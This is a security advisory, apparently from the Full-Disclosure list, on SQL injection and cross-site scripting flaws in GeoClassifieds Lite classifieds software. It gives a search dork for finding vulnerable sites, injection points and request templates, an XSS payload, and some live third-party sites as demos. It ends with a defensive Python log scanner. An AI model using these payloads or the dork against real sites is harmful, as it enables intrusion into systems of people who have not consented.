---------------------------------------------------------------------
[+] Title            : GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & v2.0.3.1 & v2.0.3.2 & v2.0.4
[+] Software Link    : http://geodesicsolutions.com/
[+] Tested on        : Windows 7
[+] Date             : 25/08/2011
[+] Dork             : "inurl:/admin/ Classifieds and Auctions Software by Geodesic Solutions"
[+] Category         : Webapps
[+] Severity         : High to Medium
[+] Author           : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site             : http://www.Yaboukir.Com
----------------------------------------------------------------------

[+] About the Software: [Purchased Price: $399 USD - $799 USD]

Geo Classifieds Premier gives you all the options of the Basic classifieds software edition, plus additional flexibility and powerful functionality. It allows you to create multiple user groups and multiple pricing plans, and is built to suit the most complicated e-commerce needs.

[+] How This Can Be Exploited:

### V2.0.1: suffers from SQL Injection and Cross-Site Scripting (XSS) vulnerabilities.

1- SQL Injection (High):

    http://Localhost/?a=19&c=id [SQL Attack]

2- Cookie-Based SQL Injection (High):

    # Read more about the attack: http://www.Yaboukir.com/cookie-based-sql-injection/

    The idea of the PoC is to intercept the HTTP request sent to the vulnerable website using a web proxy (WebScarab, for example, or just the Tamper Data Firefox add-on) and then modify the cookie variable language_id.

    GET HTTP/1.1
    Host: localhost.com
    Connection: keep-alive
    Cookie: language_id=1[SQL attack]

3- Cross-Site Scripting (Medium):

    The same applies to the XSS vulnerability: all you have to do is modify the HTTP request.

    GET HTTP/1.1
    Host: localhost.com
    Connection: keep-alive
    Cookie:

    Demos:
    http://classified4u.biz/
    http://www.freeclassifieds.aapkakolkata.com/

### V2.0.3.1 & V2.0.3.2 & V2.0.4: suffer from Cross-Site Scripting (XSS).
1- Cross-Site Scripting (Medium):

    http://Localhost/index.php?a=19&c=
    http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

    Demos:
    http://www.tescal.com/ads/
    http://www.216ads.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
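A log-review check for the two injection points this advisory names (the c parameter on the a=19 page, and the language_id cookie), as an added example that is not part of the advisory or of Geodesic's code. It assumes the web server logs the Cookie header next to the request target, and that both c (written as c=id above) and language_id are meant to be integer ids; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines (not real traffic): method, request target and the quoted
# Cookie header, assumed to be logged by the web server (e.g. Apache's %{Cookie}i).
SAMPLE_LOG = """\
GET /index.php?a=19&c=24 "language_id=1"
GET /index.php?a=19&c=24%27 "language_id=1"
GET /?a=19&c=%22+onmouseover%3Dalert%281%29+ "language_id=1"
GET /index.php?a=4&c=7 "language_id=1%27"
GET /index.php?a=4&c=7 "language_id=2"
"""
LINE_RE = re.compile(r'^(?P<method>\S+) (?P<target>\S+) "(?P<cookie>[^"]*)"$')
INTEGER = re.compile(r'^\d+$')

def parse_cookie_header(header):
    """Split a raw Cookie header into a dict, URL-decoding each value."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = unquote_plus(value)
    return cookies

def check_request(target, cookie_header):
    """Return (location, decoded value) pairs for inputs that should be integers but are not."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Assumption: on the a=19 page the c parameter is an integer id (the advisory writes c=id).
    if query.get("a") == ["19"]:
        for value in query.get("c", []):
            if not INTEGER.match(value):
                findings.append(("query:c", value))
    # language_id is a numeric selector, so any other value is a tampered cookie.
    language_id = parse_cookie_header(cookie_header).get("language_id")
    if language_id is not None and not INTEGER.match(language_id):
        findings.append(("cookie:language_id", language_id))
    return findings

def scan_log(text):
    """Return (line number, findings) for every log line carrying a suspicious value."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = LINE_RE.match(line)
        if match:
            findings = check_request(match["target"], match["cookie"])
            if findings:
                hits.append((number, findings))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to see which constructed lines are flagged; the same check can be wired into the application as input validation, which is the actual fix for both issues.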